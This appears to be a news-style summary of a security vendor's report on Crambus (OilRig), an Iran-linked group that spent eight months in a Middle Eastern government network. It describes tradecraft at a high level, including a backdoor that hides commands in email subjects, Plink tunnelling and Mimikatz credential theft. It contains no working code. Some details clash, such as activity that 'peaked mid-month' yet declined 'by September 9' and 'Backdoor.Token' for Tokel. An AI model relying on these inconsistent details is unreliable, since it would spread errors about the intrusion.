Table of Contents
Crambus Activity Details
Crambus, an Iran-linked hacking group, was reported to have infiltrated a Middle Eastern government network. According to Broadcom's Symantec cybersecurity unit, the hacking group maintained a presence within the compromised network for eight months, during which they performed operations of stealing data, obtaining credentials, and deploying malware on multiple systems. The intrusion began on February 1 with a solitary system executing a PowerShell script. Over the duration of their illegal entry, systems were compromised in a phased manner, with evidence of malicious activity escalating towards the end of August and into September. In total, Symantec recorded at least 12 computers with suspicious activity and deployment of backdoors and keyloggers in dozens more.
Crambus and its Iran Connection
Crambus is often considered synonymous with other known cyber espionage entities such as APT34 (also recognized as Cobalt Gypsy, OilRig, and Helix Kitten), and MuddyWater (alternatively referred to as Mango Sandstorm, Mercury, Seedworm, and Static Kitten) by cybersecurity firms. Both APT34 and MuddyWater reportedly conduct espionage operations aligning to the objectives of the Iranian Government. Notably, US Cyber Command has previously associated MuddyWater with Iranian intelligence institutions. Together, these links support a connection between Crambus and Iran.
Deployed Malware Families
During this attack, Crambus installed a PowerShell backdoor, PowerExchange, which allowed access to Microsoft Exchange Servers. Additionally, the hacking group was reported deploying three new malware families, including the Tokel backdoor, the Dirps trojan, and the Clipog infostealer. These malware enhanced the hackers' ability to execute commands, download files, steal clipboard data, engage in keylogging, and log processes where keystrokes are entered.
Network Compromise and Remote Access
For deeper penetration, the attackers made use of the network administration tool Plink to set port-forwarding rules and facilitate access via Remote Desktop Protocol (RDP). They also modified firewall rules to secure remote access. Simultaneously, the utilization of the PowerExchange backdoor and the deployment of fresh malware guaranteed complete control and continued data theft from the compromised network.
The Attack Overview
The Iran-linked hacking group known as Crambus, or OilRigs, executed a meticulously planned cyberattack on a Middle Eastern government network, marked by its extensive duration and usage of various tools, scripts, and techniques. With evidence of activity spread across at least 12 computers, the intrusion unfolded over a period of eight months commencing February 1, 2023.
Commencement of the Attack
The infiltration began stealthily with the running of a PowerShell script on a single system. The attackers spent the initial week running this script multiple times, gradually amplifying their malicious activity. By February 5, a second system was compromised, with the hackers using a disguised form of Plink to configure Remote Desktop Protocol (RDP) access to facilitate further intrusion.
Cross-system Expansion
On February 21, the command 'netstat /an' was run on a web server, indicating the network's exposure to the hackers. Following this, in April, two more systems fell prey to the hackers, who deployed Mimikatz to capture credentials. With the breach spreading across multiple systems, they had a strong foothold in the network by June.
Deepening Intrusion and Malicious Activity
The height of the attack was realized following the execution of Backdoor.Tokel and PowerExchange on the compromised machines, marking the commencement of the major phase of the attack. Subsequently, the hackers deployed TrojanDirps and Infostealer.Clipog, and simultaneously established SSH tunnels with Plink—an indicator of their successful network penetration. In August, the hackers shifted their focus toward detecting Log4j vulnerabilities, while compromising an additional web server by the month-end.
Attack Peak and Decline
By early September, the attackers had breached three more computers and were utilizing certutil to enable further attack. The activity peaked mid-month, with two more systems compromised and the Backdoor.Token implant executed on them. This flurry of activity finally began to decline by September 9, by which point the hackers had effectively executed their intrusive operations and expanded access across multiple systems in the compromised network.
Deployed Malware and Backdoor
The Iranian hacker group, known as OilRig or APT34, is reputed for its strategic approach of blending in with normal network traffic, thereby minimizing chances of detection. The highlight of their strategy is the installation of a backdoor and manipulating firewall rules for further compromise. Equally noteworthy is the group's deployment of a blend of malware families, thereby diversifying their attack methodology and bolstering their intrusion capabilities.
PowerExchange Backdoor Installation
The hackers installed a PowerShell backdoor, labeled as 'PowerExchange,' which was tasked to log into an Exchange Server and monitor incoming emails for specific indicators. In this case, the indicator was "@@" in the email subject line, informing the malware of the presence of base64-encoded attachments carrying execution commands. This backdoor thus acted as a launchpad for executing arbitrary PowerShell commands, generally associated with file writing or exfiltration actions, and then shifted processed emails to 'Deleted Items' to decrease the likelihood of detection.
Usage of Plink Tool and Firewall Manipulation
APT34 also utilized the Plink tool, a command-line utility for PuTTY SSH client, that enabled them to set port-forwarding rules and configure Remote Desktop Protocol (RDP) access. This, combined with strategically modified firewall rules, ensured that the hackers could readily penetrate deeper into the network, thereby gaining widespread access and causing more significant breaches.
Deployment of New Malware Families
Diversifying their attack methodology was another strategy adopted by APT34, which was achieved through the deployment of new malware families. This involved introducing the Tokel backdoor, characterized by its ability to execute PowerShell commands and download files, and the Dirps Trojan, known for its file enumeration capabilities and ability to run PowerShell commands. Another malware deployed was the Clipog Infostealer, which principally focused on data theft, keylogging, and capturing keystrokes.
Implications of Crambus’s Presence
The extended presence of Iranian hacking group Crambus within a Middle Eastern government network signifies a significant security concern. The group's clandestine presence and extended data theft operation underlined their sophisticated tactics and potential threat to national security infrastructures. The subtle nature of the attack allowed Crambus to compromise at least 12 computers and possibly more, and the ability to embed into the network undetected for eight months raises questions about the robustness of existing cybersecurity measures.
Relevant Authority Actions
In response to cyber threats such as the one posed by Crambus, authorities have begun cracking down on hack-related resources. Notably, this includes the seizure of RagnarLocker Ransomware's Dark Web site—a notable source of cyber threats. Such actions highlight the increasing necessity and urgency of proactive measures taken against cybercriminals.
Related Cyber Attacks
The sustained presence and activities of Crambus are indicative of a broader trend of state-sponsored Advanced Persistent Threat (APT) actors launching sophisticated cyber attacks. Besides Crambus, several other Iran-linked hacker groups have been linked to recent incidents. For example, Iranian APTs were found exploiting a recent vulnerability in PaperCut. Similarly, Iranian Cyberspies targeted a US-based think tank with a novel macOS malware. These incidents underscore the increasing aggression and advancement of Iran-associated cyber warfare.
